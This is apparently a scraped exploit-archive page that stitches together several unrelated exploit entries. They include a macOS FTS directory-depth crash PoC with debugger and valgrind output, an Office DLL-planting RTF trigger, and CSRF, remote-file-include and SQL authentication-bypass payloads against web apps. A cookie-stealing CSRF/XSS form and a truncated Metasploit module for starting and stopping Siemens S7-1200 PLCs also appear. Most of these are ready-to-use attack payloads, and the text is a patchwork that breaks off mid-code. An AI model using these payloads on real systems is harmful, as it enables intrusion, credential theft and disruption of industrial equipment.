- MACOS's Commands such as: ls, find, rm 
- iPhone 4s and later,
- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes
- Apple TV (4th generation)
- probably more

Apple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting.

PoC:
Create an direcotry and perform the following actions:


# for i in {1..1024}; do mkdir B && cd B; done
...
cd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory


If such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g.


# for i in {1..1024}; do cd .. ; done


Then you can perform recursive 'ls' command. Let's run it ten times:


# for i in {1..10}; do ls -laR > /dev/null; done
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
ls: B: No such file or directory
Segmentation fault: 11
Segmentation fault: 11
Segmentation fault: 11
ls: B: No such file or directory
ls: B: No such file or directory
Segmentation fault: 11
ls: B: No such file or directory
ls: B: No such file or directory


crash randometly. Let's see valgrind and lldb 


LLDB:
...
/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:
total 0
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8

./B/B/B/B/B/B/B/B/..../B/B:
Process 987 stopped
* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)
frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18
libsystem_c.dylib`strlen:
-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0
0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi
0x7fff97ab6d3a <+26>: andq $0xf, %rcx
0x7fff97ab6d3e <+30>: orq $-0x1, %rax

(lldb) x/x $rdi
error: memory read failed for 0xfeb66c00
(lldb) register read
General Purpose Registers:
rax = 0x00000000ffffffff
rbx = 0x00000000ffffffff
rcx = 0x00000000feb66c08
rdx = 0x00000000feb66c08
rdi = 0x00000000feb66c00
rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742
rbp = 0x00007fff5fbfe710
rsp = 0x00007fff5fbfe710
...
rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18
...
(lldb) bt
* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)
* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18
frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713
frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669
frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596
frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80
frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128
frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564
frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421
frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300
frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1

=== Time for Valgrind =============

B/B/B/B/B/../B:
total 0
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8

./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:
total 0
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8
==1009== Invalid write of size 1
==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x100001DAD: ??? (in /bin/ls)
==1009== by 0x100001A6F: ??? (in /bin/ls)
==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)
==1009== by 0x1: ???
==1009== by 0x104809C8A: ???
==1009== by 0x104809C8D: ???
==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd
==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x100001B92: ??? (in /bin/ls)
==1009== by 0x100001A6F: ??? (in /bin/ls)
==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)
==1009== by 0x1: ???
==1009== by 0x104809C8A: ???
==1009== by 0x104809C8D: ???
==1009== 

./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:
==1009== Invalid read of size 1
==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x1000024A7: ??? (in /bin/ls)
==1009== by 0x100001CFC: ??? (in /bin/ls)
==1009== by 0x100001A6F: ??? (in /bin/ls)
==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)
==1009== by 0x1: ???
==1009== by 0x104809C8A: ???
==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd
==1009== 
==1009== 
==1009== Process terminating with default action of signal 11 (SIGSEGV)
==1009== Access not within mapped region at address 0x102D20318
==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)
==1009== by 0x1000024A7: ??? (in /bin/ls)
==1009== by 0x100001CFC: ??? (in /bin/ls)
==1009== by 0x100001A6F: ??? (in /bin/ls)
==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)
==1009== by 0x1: ???
==1009== by 0x104809C8A: ???
==1009== If you believe this happened as a result of a stack
==1009== overflow in your program's main thread (unlikely but
==1009== possible), you can try to increase the size of the
==1009== main thread stack using the --main-stacksize= flag.
==1009== The main thread stack size used in this run was 8388608.
==1009== 
==1009== HEAP SUMMARY:
==1009== in use at exit: 1,671,999 bytes in 6,025 blocks
==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated
==1009== 
==1009== LEAK SUMMARY:
==1009== definitely lost: 519 bytes in 6 blocks
==1009== indirectly lost: 104 bytes in 6 blocks
==1009== possibly lost: 0 bytes in 0 blocks
==1009== still reachable: 1,645,151 bytes in 5,819 blocks
==1009== suppressed: 26,225 bytes in 194 blocks
==1009== Rerun with --leak-check=full to see details of leaked memory
==1009== 
==1009== For counts of detected and suppressed errors, rerun with: -v
==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
Segmentation fault: 11
MacMini:SCANME cxsecurity$


It looks like a buffer overflow in memmove(). Code

http://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c


The same issue for 'find' which may be used in cron scripts like


./periodic/daily/110.clean-tmps:	find -dx . -fstype local -type f $args -delete $print
./periodic/daily/110.clean-tmps:	find -dx . -fstype local ! -name . -type d $dargs -delete $print
./periodic/daily/140.clean-rwho:	rc=$(find . ! -name . -mtime +$daily_clean_rwho_days 
./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1;


Let's see valgrind output.


MacMini:SCANME cxsecurity$ valgrind find . -name "R"
==1055== Memcheck, a memory error detector
==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==1055== Command: find . -name R
==1055== 
find: ./.Trashes: Permission denied
==1055== Invalid write of size 2
==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)
==1055== by 0x1000013FA: ??? (in /usr/bin/find)
==1055== by 0x1000052AD: ??? (in /usr/bin/find)
==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)
==1055== by 0x3: ???
==1055== by 0x10480CC7F: ???
==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd
==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib)
==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)
==1055== by 0x1000013FA: ??? (in /usr/bin/find)
==1055== by 0x1000052AD: ??? (in /usr/bin/find)
==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)
==1055== by 0x3: ???
==1055== by 0x10480CC7F: ???
...

Invalid memory write without crashing.


BTW:
Many vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc.

====== References ===================================
https://cxsecurity.com/issue/WLB-2014040027
https://cxsecurity.com/cveshow/CVE-2014-4433/
https://cxsecurity.com/cveshow/CVE-2014-4434/
https://cxsecurity.com/issue/WLB-2013110059
https://cxsecurity.com/cveshow/CVE-2013-6799/
https://cxsecurity.com/issue/WLB-2010040284
https://cxsecurity.com/cveshow/CVE-2010-0105/
https://cxsecurity.com/issue/WLB-2005090063


====== Thanks ===================================
Kacper and Smash_ from DEVILTEAM for technical support. 


====== Credit ===================================
Maksymilian Arciemowicz from cxsecurity.com

http://cxsecurity.com/
http://cert.cx/
http://cifrex.org/
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=514

It is possible for an attacker to execute a DLL planting attack in Microsoft Office with a specially crafted OLE object. Testing was performed on a Windows 7 x64 virtual machine with Office 2013 installed and the latest updates applied. The attached POC document "planted.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {394c052e-b830-11d0-9a86-00c04fd8dbf7} (formatted as pack(">IHHBBBBBBBB")) which is one of several registered objects that have an InProcServer32 of els.dll. Other options include: {975797fc-4e2a-11d0-b702-00c04fd8dbf7} and {f778c6b4-c08b-11d2-976c-00c04f79db19}. When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to els!DllGetClassObject() which does a LoadLibraryW() call for elsext.dll (and riched32.dll but that's already loaded in winword.exe). If the attached elsext.dll is placed in the same directory with the planted.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.

Here is the call stack leading up to the vulnerable LoadLibraryW() call. Also, it appears there are private symbols for ole32.dll on the public symbol server again. 

0:000> kb
ChildEBP RetAddr  Args to Child              
005982a4 60e94cca 60e92464 9582fa74 00000000 kernel32!LoadLibraryW
00598538 60e94d71 00000000 0059857c 60ea3209 els!WinbaseIsolationAwarePrivatetRgzlnPgpgk+0x1a8
00598544 60ea3209 00598560 9582fa30 00000000 els!IsolationAwarePrivatenPgViNgRzlnPgpgk+0x30
0059857c 60ea36b6 9582f680 60ea6d20 007cbfe8 els!IsolationAwareInitCommonControls+0x28
005989cc 60e933d1 60e94377 0360ac4c 60ea6ce1 els!InitGlobals+0x2c3
005989d0 60e94377 0360ac4c 60ea6ce1 005990a4 els!CDll::AddRef+0xe
005989d8 60ea6ce1 005990a4 036087e0 00000000 els!CComponentDataCF::CComponentDataCF+0x10
005989ec 75bbaec6 0360ac3c 75bbee84 00598a94 els!DllGetClassObject+0x77
00598a08 75b991cd 0360ac3c 75bbee84 00598a94 ole32!CClassCache::CDllPathEntry::DllGetClassObject+0x30 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3324]
00598a20 75b98e92 00598a34 75bbee84 00598a94 ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+0x1f [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3831]
00598a58 75b98c37 00598a9c 00000000 005990a4 ole32!CClassCache::GetClassObject+0x49 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 4582]
00598ad4 75bb3170 75cb6444 00000000 005990a4 ole32!CServerContextActivator::CreateInstance+0x110 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 974]
00598b14 75b98daa 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
00598b68 75b98d1f 75cb646c 00000000 005990a4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
00598b88 75b98aa2 75cb6494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
00598ba8 75b98a53 75cb6494 00598f00 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
00598be4 75b98e0d 75cb6494 00598f00 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
00598c0c 75bb3170 75cb6494 00000000 005990a4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
00598c4c 75bb2ef4 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
00598eac 75bb3170 75cb6448 00000000 005990a4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
00598eec 75bb3098 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
005996c8 75bb9e25 005997e4 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
00599728 75bb9d86 005997e4 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
0059974c 75bb9d3f 005997e4 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
0059977c 75bd154c 005997e4 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
005997f8 75bcf2af 394c052e 11d0b830 c000869a ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
0059985c 75bcf1d4 16260820 00000000 5f7a6600 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
00599884 703bca10 16260820 5f7a6600 097b2f00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
WARNING: Stack unwind information not available. Following frames may be wrong.
005998f8 5fb7efb2 16260820 5f7a6600 097b2f00 mso!Ordinal4743+0x7c
00599948 5fb7eeb9 09775da8 16260820 5f7a6600 wwlib!DllGetLCID+0x3bc330

It is also possible to trigger this DLL load without a user click with the following RTF document:

{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7b394c052e-b830-11d0-9a86-00c04fd8dbf7\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38918.zip
HireHackking 
source: https://www.securityfocus.com/bid/64540/info

JForum is prone to a cross-site request-forgery vulnerability because the application does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. 

http://www.example.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2
HireHackking 
source: https://www.securityfocus.com/bid/64541/info

AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/64541/info
 
AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
 
http://www.example.com/afcontrol/adminpassword.php?rootpathtocart=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/64541/info
  
AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
  
http://www.example.com/afcontrol/controlheader.php?rootpathtocart=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/64564/info

WordPress is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WordPress 2.0.11 is vulnerable.

http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1
HireHackking 
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
iy10 Dizin Scripti   => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Åžeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
					  KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version 
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek için tıklayın !"

################## ++ CSRF Admin Password Change Exploit ++ ######################################

<html>
  <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

################# ++ SQL Injection with Authentication Bypass ++###########################################

http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1

############################################################
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
              
Command School Student Management System is prone to the following security vulnerabilities:
              
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
              
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
              
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://http://www.example.com/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>
HireHackking 
# Exploit Title:  Simatic S7 1200 CPU command module
# Date: 15-12-2015
# Exploit Author: Nguyen Manh Hung
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1214C
# CVE : None
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	
	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Scanner
	def initialize(info = {})
		super(update_info(info,
			'Name'=> 'Simatic S7-1200 CPU START/STOP Module',
			'Description'   => %q{
				Update 2015
				The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP.
			},
			'Author'      => 'Nguyen Manh Hung <tdh.mhung@gmail.com>',
			'License'           => MSF_LICENSE,
			'References'     =>
				[
					[ 'nil' ],
				],
			'Version'        => '$Revision$',
			'DisclosureDate' => '11-2015'
			))
			
			register_options(
				[
					Opt::RPORT(102),
					OptInt.new('FUNC',[true,'func',1]),
					OptString.new('MODE', [true, 'Mode select:
					START -- start PLC
					STOP  -- stop PLC
					SCAN  -- PLC scanner',"SCAN"]),
				], self.class)
	end
####################################################################################
	def packet()
		packets=[		#dua tren TIA portal thay cho hello plc
						"\x03\x00\x00\x23\x1e\xe0\x00\x00"+
						"\x00\x06\x00\xc1\x02\x06\x00\xc2"+
